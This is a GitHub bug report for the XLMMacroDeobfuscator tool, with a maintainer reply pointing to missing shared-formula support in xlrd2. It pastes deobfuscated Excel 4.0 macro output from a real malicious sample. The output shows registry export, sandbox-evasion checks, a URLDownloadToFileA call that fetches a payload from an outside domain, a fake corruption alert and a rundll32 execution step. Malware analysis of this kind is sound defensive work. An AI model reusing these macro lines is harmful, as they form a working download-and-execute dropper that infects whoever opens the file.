-
-
Notifications
You must be signed in to change notification settings - Fork 115
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Error [deobfuscator.py:2433.... #77
Labels
bug
Something isn't working
Comments
Seems a problem in xlrd2 parser (xls). It doesn't support parsing shared formula. Will test soon. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
When analyzing a malicious document with version 0.1.4, analysis proceeds until...
XLMMacroDeobfuscator(v0.1.7) - https:/DissectMalware/XLMMacroDeobfuscator
File: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin
Unencrypted xls file
[Loading Cells]
SHRFMLA (sub): 0 0 1 8 6
SHRFMLA (sub): 9 9 1 8 8
SHRFMLA (sub): 19 19 1 7 7
SHRFMLA (sub): 26 26 0 7 8
auto_open: auto_open->'CSHykdYHvi'!$J$727
[Starting Deobfuscation]
CELL:J727 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5)
CELL:J728 , PartialEvaluation , =WAIT("2021-02-20 14:47:40.575765")
CELL:J729 , FullEvaluation , FOPEN("c:\users\public\1.reg",1)
CELL:J730 , PartialEvaluation , =FPOS(FOPEN("c:\users\public\1.reg",1),215)
CELL:J732 , PartialEvaluation , =FCLOSE(FOPEN("c:\users\public\1.reg",1))
CELL:J733 , PartialEvaluation , =FILE.DELETE("c:\users\public\1.reg")
CELL:J734 , Branching , IF(ISNUMBER(SEARCH("0001",J731)),CLOSE(FALSE),GOTO(J1))
CELL:J734 , FullEvaluation , [FALSE] GOTO(J1)
CELL:J1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",K2)
CELL:J2 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",K4)
CELL:J4 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5)
CELL:J5 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(42),,CLOSE(TRUE))",K6)
CELL:J6 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7)
CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8)
CELL:J8 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9)
CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11)
CELL:J11 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12)
CELL:J12 , PartialEvaluation , =WORKBOOK.HIDE("CSHykdYHvi",TRUE)
CELL:J13 , FullEvaluation , GOTO(K2)
CELL:K2 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
CELL:K4 , FullEvaluation , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
Error [deobfuscator.py:2433 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('NAME', 'FMLA') at line 1, column 9.
Expected one of:
* $END
* CONCATOP
* ADDITIVEOP
* L_PRA
* CMPOP
* MULTIOP
* EXCLAMATION
Previous tokens: [Token('NAME', 'SHARED')]
Files:
[END of Deobfuscation]
time elapsed: 0.1893155574798584
sample MD5: b5d469a07709b5ca6fee934b1e5e8e38
The text was updated successfully, but these errors were encountered: